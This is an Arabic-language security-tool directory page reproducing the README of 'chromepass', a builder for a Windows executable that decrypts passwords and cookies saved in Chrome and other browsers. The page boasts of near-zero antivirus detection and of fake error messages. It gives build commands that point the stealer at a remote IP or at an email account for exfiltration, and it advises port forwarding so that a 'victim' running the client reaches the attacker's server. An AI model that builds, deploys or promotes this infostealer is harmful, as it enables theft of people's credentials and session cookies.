Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
chromepass — Chromepass - اختراق كلمات المرور المحفوظة في كروم | Kitploit
أدوات/GitHubGitHub/darkarp/chromepass
كسر كلمات المرورتسريب البياناتالتصيد الاحتياليالفريق الأحمر
GitHubdarkarp/chromepass

chromepass

Chromepass - اختراق كلمات المرور المحفوظة في كروم

عرض المستودع
8381117منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Chromepass - اختراق كلمات المرور وملفات تعريف الارتباط المحفوظة في Chrome

Release Build Status on CircleCI
Scrutinizer code quality (GitHub/Bitbucket)
GitHub issues GitHub closed issues

عرض توضيحي · الإبلاغ عن خطأ · طلب ميزة

جدول المحتويات

  • حول المشروع
    • اكتشاف برامج مكافحة الفيروسات
  • بدء الاستخدام
    • المتطلبات
    • التثبيت
  • الاستخدام
  • البريد الإلكتروني
  • الأخطاء والثغرات وطلبات الميزات
  • تعلم المزيد
  • الترخيص
  • العرض التوضيحي

حول المشروع

Chromepass هو تطبيق وحدة تحكم مكتوب بلغة Python يقوم بإنشاء ملف تنفيذي لنظام Windows يتمتع بالميزات التالية:

  • فك تشفير كلمات المرور وملفات تعريف الارتباط المحفوظة في Google Chrome وChromium وEdge وBrave وOpera وVivaldi
  • إرسال ملف يحتوي على مجموعات اسم المستخدم/كلمة المرور وملفات تعريف الارتباط عن بُعد (خادم HTTP أو بريد إلكتروني)
  • غير قابل للاكتشاف بواسطة برامج مكافحة الفيروسات إذا تم بشكل صحيح
  • أيقونة مخصصة
  • رسالة خطأ مخصصة
  • تخصيص المنفذ

اكتشاف برامج مكافحة الفيروسات!

منهجية بناء العميل الجديدة تضمن عمليًا معدل اكتشاف 0%، حتى بدون تكتيكات التهرب من برامج مكافحة الفيروسات. إذا أصبح هذا غير صحيح في المستقبل، سيتم تنفيذ بعض الطرق لتحسين التهرب من برامج مكافحة الفيروسات.

مثال على أحدث الفحوصات (ملاحظة: خلال 10-12 ساعة ننتقل من 0-2 اكتشافات إلى 32 اكتشافًا، لذا قم بتشغيل التحليل على بنياتك الخاصة):

  • VirusTotal Scan 1
  • VirusTotal Scan 2
  • VirusTotal Scan 3
  • VirusTotal Scan 4

بدء الاستخدام

المتطلبات الأساسية

هذا تطبيق بسيط جدًا، يستخدم فقط:

  • Python - تم اختباره على Python 3.9+

يوصى بإجراء التثبيت داخل جهاز ظاهري يعمل بنظام Windows. قد تتأثر بعض أجزاء إجراء التثبيت بالتكوينات الموجودة. تم اختبار ذلك على جهاز ظاهري نظيف يعمل بنظام Windows 10.

التثبيت

يتطلب Chromepass نظام Windows للتجميع! قد يتم إضافة دعم لنظامي Linux وmacOS قريبًا.

استنساخ المستودع:

root@kitploit:~
git clone https://github.com/darkarp/chromepass

ملاحظة: بدلاً من استنساخ المستودع، يمكنك تنزيل أحدث إصدار، حيث أن المستودع قد يكون أكثر عرضة للأخطاء.

تثبيت التبعيات:

يتم فحص وتثبيت التبعيات تلقائيًا، لذا يمكنك الانتقال مباشرة إلى الاستخدام. يُنصح باستخدام جهاز ظاهري نظيف للتأكد من عدم وجود تعارضات.

إذا لم تكن لديك التبعيات وإنترنتك ليس سريعًا، فسيستغرق ذلك بعض الوقت. احصل على بعض القهوة.


الاستخدام

Chromepass سهل الاستخدام للغاية. ابدأ بتشغيل:

root@kitploit:~
python create.py -h

ستظهر قائمة بالخيارات وهي واضحة بذاتها.

التشغيل بدون أي معلمات سيبني الخادم والعميل متصلين بـ 127.0.0.1.

مثال بسيط على بناء:

root@kitploit:~
python create.py --ip 92.34.11.220 --error --message 'حدث خطأ'

بعد إنشاء الخادم والعميل، تأكد من تشغيل الخادم عند تشغيل العميل.

سيتم حفظ ملفات تعريف الارتباط وكلمات المرور في ملفات json في مجلد جديد باسم data في نفس دليل الخادم، مفصولة بعنوان IP.


البريد الإلكتروني

يدعم Chromepass إرسال الملفات عبر البريد الإلكتروني، على الرغم من أنه لا يزال تجريبيًا. لتمكين ذلك، يمكنك استخدام العلم --email أثناء إنشاء الخادم. ستحتاج إلى شيئين: اسم مستخدم (بريدك الإلكتروني) وكلمة مرور (كلمة مرور تطبيق).

لإنشاء كلمة مرور تطبيق، يجب الذهاب إلى إعدادات الحساب -> الأمان وتمكين المصادقة بخطوتين (مطلوب!)

بعد تمكين المصادقة بخطوتين، سترى خيارًا جديدًا باسم كلمات مرور التطبيقات: 2-step-authentication

انقر هناك ثم اختر الخيارات المناسبة ثم قم بإنشاء كلمة مرور: 2-step-authentication

بعد النقر على إنشاء، ستحصل على كلمة المرور المطلوبة. يمكنك استخدام اسم المستخدم وكلمة المرور مباشرة في الأمر أو ببساطة وضعهما داخل ملف config.ini، حيث مكتوب YOUR_USERNAME و YOUR_PASSWORD.

مثال مع بيانات الاعتماد في الأمر

root@kitploit:~
python create.py --error --message 'حدث خطأ' --email --username [email protected] --password qwertyuiopasdfghh

إذا وضعت بيانات الاعتماد في ملف التكوين (سترى أين إذا فتحت هذا الملف)

root@kitploit:~
python create.py --error --message 'حدث خطأ' --email

ملاحظات عن بعد

إذا كنت ترغب في استخدام هذا في سيناريو عن بُعد، يجب عليك أيضًا إعادة توجيه المنفذ (المنفذ 80 افتراضيًا)، بحيث عندما يشغل الضحية العميل، يمكنه الاتصال بالخادم على المنفذ الصحيح.
لمزيد من المعلومات العامة، انقر هنا. إذا لم تكن راضيًا بعد، قم بإجراء بحث على Google.


التثبيت اليدوي للتبعيات

الإعداد التلقائي تجريبي. لسبب أو لآخر، قد يفشل الإعداد في تثبيت التبعيات بشكل صحيح. إذا كان الأمر كذلك، يجب تثبيتها يدويًا.
لحسن الحظ، هناك تبعيتان فقط:

  • Microsoft Visual C++ Build Tools (قم بالتثبيت باستخدام سير العمل الموصى به)
  • Rustup

بدلاً من أدوات البناء، يمكنك أيضًا تثبيت Visual Studio ولكن سيشغل مساحة أكبر.

بعد تثبيت أدوات البناء بنجاح، يمكنك ببساطة تشغيل rustup-init.exe من موقع Rustup.

هذا يكمل التبعيات المطلوبة ويجب أن تكون جاهزًا.


الأخطاء والثغرات وطلبات الميزات

إذا وجدت خطأ أو ثغرة، يرجى الإبلاغ عنها كـ issue. إذا كنت ترغب في اقتراح ميزة أو تحسين، يرجى الإبلاغ عنها في صفحات issue.

يرجى اتباع القوالب المعروضة عند إنشاء الـ issue.


تعلم المزيد

للوصول إلى مجتمع مليء بمحترفي أمن الكمبيوتر الطموحين، من المبتدئين تمامًا إلى المخضرمين المتمرسين، انضم إلى خادم Discord الخاص بنا: WhiteHat Hacking

إذا كنت ترغب في الاتصال بي، يمكنك القيام بذلك عبر: [email protected]


إخلاء مسؤولية

أنا لست مسؤولاً عن ما تفعله بالمعلومات والكود المقدمين. هذا مخصص للأغراض المهنية أو التعليمية فقط.

الترخيص

AGPL-3.0


Code Intelligence Status

العرض التوضيحي

til

تنزيل الأداة